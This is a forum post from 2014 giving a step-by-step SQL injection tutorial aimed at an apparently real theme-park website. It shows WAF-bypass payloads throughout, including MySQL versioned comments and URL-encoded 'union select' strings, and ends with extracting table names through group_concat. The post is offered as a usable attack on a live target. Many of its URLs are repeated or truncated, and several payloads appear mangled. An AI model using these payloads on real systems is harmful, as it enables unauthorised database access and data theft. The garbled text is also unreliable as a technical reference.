Sn1p3r Posted August 18, 2014 Share Posted August 18, 2014 Simple WAF Bypass Today i give you idea as "waf bypass with error 403404406 and also url encode" http://wonderlandthe...rpark.php?wid=5'>http://wonderlandthe...rpark.php?wid=5'>http://wonderlandthe...rpark.php?wid=5'>http://wonderlandthe...rpark.php?wid=5 this is our target and is vulnerable. Find the number of columns:- lets try to find the column's numbers http://wonderlandthe...rpark.php?wid=5 order by 1-- Not work and give a error its means order is not work. some time in some case order is not work so than try to use group. means just replace the order with group like: http://wonderlandthe...rpark.php?wid=5 group by 1-- work :-) like this we increase the numbers until we get an error. http://wonderlandthe...rpark.php?wid=5 group by 4-- we get a error its means it have 3 number of column Now check the "Union fuction" http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5'>http://wonderlandthe...park.php?wid=-5 union select 123-- not work:/ give a error with 404 and 406. Now i m tell you little bit knowledge about a 404 and 406 error Error 404: when we get 404 error so we need to use filter and other thing. But in this web filter/special comment is work special comment /*! and */ . using of it we can bypass the 404 error Error 406: when we get 406 error so we need to bypass it with union url encoding. Now come to point. we use special comment/filter with url encode for bypass our web like : http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 123-- BYpass Posted Image but i am tell you about 403 error when we get 403 error so we need to use over lopping on the union and select like:- /*!00000union*/ /*!00000select*/ Now come on our target: when we use union function we donot see any vuln column number on the page but we see one thing like cracking a pic so it means that the vuln column number hidden one the html code before open the code we will do some different on the qurey for easy see the vuln number like: http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111111-- now open the code and press ctrl+f and put 1 no result than put 11 no result than put 111 and we will get the vuln number. Now find the "Version" http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version()-- not work error on () this now use url encode http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111version%28%29-- bypass now open the html code and press ctrl+f and put 5.1 and you will see th version like 5.1.73-cll now i will try to print the version one the page with using concat() http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28version%28%29%29-- work but also in html code now i am use html tag like before the '">' use it and after the version use it ' and you also use html tag in hex. let try to print the version on page http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111concat%28'">'version%28%29' worked Posted Image EXTRACTING DATABASE TABLES:- i will do it with using url encode and filter like http://wonderlandthe...park.php?wid=-5 /*!%55nion*/ /*!%53elect*/ 111group_concat%28/*!'">'table_name*/' wroked :-) done Link to comment Share on other sites More sharing options...
Recommended Posts